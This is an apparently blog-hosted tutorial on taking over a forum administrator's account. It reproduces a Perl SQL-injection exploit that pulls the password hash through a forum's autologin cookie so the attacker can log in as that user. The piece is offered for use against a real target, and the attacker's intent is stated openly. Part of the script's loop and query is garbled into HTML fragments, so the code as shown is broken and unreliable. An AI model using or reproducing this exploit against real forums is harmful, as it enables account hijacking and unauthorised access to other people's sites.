How to Hack into forums

This is what you like to call “Hacking a forum”.

I call it “Cracking into a forum” … Learn what hacking means you, lol…

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.

So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.

Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:

CODE

#!/usr/bin/perl -w

##################################################################

# This one actually works :) Just paste the outputted cookie into

# your request header using livehttpheaders or something and you

# will probably be logged in as that user. No need to decrypt it!

# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com

##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;

$ua->agent(”Mosiac 1.0″ . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = ”;}

if (!$ARGV[3]) {$ARGV[3] = ”;}

my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;

my $user = $ARGV[1]; # userid to jack

my $iver = $ARGV[2]; # version 1 or 2

my $cpre = $ARGV[3]; # cookie prefix

my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])

{

print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n”;

exit;

}

my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);

my $outputs = ”;

for( $i=1; $i < j=”0;” current =” $charset[$j];” sql =” (” cookie =” (’Cookie’”> $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);

my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this

# does not appear anywhere in the sources

$pattern = ”;

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )

{

$outputs .= $current;

print “$current\n”;

last;

}

}

if ( length($outputs) < member_id=” . $user . ” pass_hash=”">

What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script.

Post a Comment

Previous Post Next Post